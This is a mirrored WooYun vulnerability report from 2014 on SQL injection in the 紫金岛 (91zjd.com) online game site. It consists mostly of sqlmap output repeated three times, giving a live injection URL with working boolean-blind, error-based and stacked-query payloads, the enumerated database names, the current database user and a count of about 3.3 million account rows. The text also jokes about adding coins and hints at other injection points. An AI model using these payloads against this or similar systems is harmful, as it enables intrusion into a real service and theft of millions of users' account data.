乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-30: 细节已通知厂商并且等待厂商处理中 2014-05-05: 厂商已经主动忽略漏洞,细节向公众公开
"紫金岛"SQL注射漏洞,多个木其PAI数据库爆库,300万游戏账户存在泄露风险。兑话费,加金币,一夜从屌丝变高富帅.
漏洞站:紫金岛(http://www.91zjd.com/)注入点:http://www.91zjd.com/smsqw/dxzc_ctcc.asp?username=admin
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: username=admin'; WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008available databases [20]:[*] DB_BACKUP[*] master[*] model[*] msdb[*] QPGameBSTEST[*] QPGameDB[*] QPGameHFDB[*] QPGameJDDB[*] QPGameTYDB[*] QPGameUserDB[*] QPPromotionDB[*] QPServerInfoDB[*] QPServerInfoDB_NEW[*] QPTreasureDB[*] QPTreasureMatchDB[*] QPWebGameDB[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] ZjdGameWebDBsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: username=admin'; WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008current user: 'game_db_user'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: username=admin'; WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008Select count(*) from AccountsInfo: '3339832'
这个大家都懂只是注入点还有很多,不一一列出了,请自行检查。
危害等级:无影响厂商忽略
忽略时间:2014-05-05 15:50
暂无